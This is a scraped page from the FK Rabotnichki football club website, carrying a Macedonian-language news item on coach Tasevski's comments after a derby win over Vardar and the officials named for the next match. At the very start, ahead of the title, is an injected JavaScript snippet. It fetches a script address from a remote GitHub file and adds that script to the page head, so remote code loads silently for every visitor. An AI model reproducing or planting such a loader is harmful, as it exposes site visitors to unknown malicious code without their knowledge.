;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Тасевски: Голема дерби – победа над Вардар, но да ја потврдиме и со триумф против Македонија ЃП
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Тасевски: Голема дерби – победа над Вардар, но да ја потврдиме и со триумф против Македонија ЃП

Работнички оствари значаен триумф (0-1) над Вардар во градското дерби и се искачи на четвртата позиција на табелата со 20 освоени бода. Тренерот Жикица Тасевски изразува задоволство од настапот на својот тим и освоените три бода, но вели дека многу важно е победата да биде потврдена со ново добро издание и против Македонија ЃП в недела.

„Остваривме голема победа во дербито со Вардар. На такви натпревари, бодовите се најважни, а ние успеавме да стигнеме до нив со голема борба и максимална тактичка дисциплина во текот на целиот натпревар. Тимот се издигна на посакуваното ниво, но сега е уште поважно да го задржиме истиот ритам и на следниот меч против Македонија ЃП в недела. Работнички мора да игра добро и да победува во континуитет“, вели шефот на стручниот штаб, Жикица Тасевски.

Одредени се и официјалните лица за неделниот меч против Македонија ЃП. Главен судија ќе биде Александар Ставрев, а ќе му помагаат Марјан Кировски и Дејан Костадинов. Четврти судија ќе биде Никола Костенчев (сите од Скопје).

За делегат на натпреварот е одреден Димче Маневски (Велес), а контролор на судењето ќе биде Делчо Јакимовски (Скопје).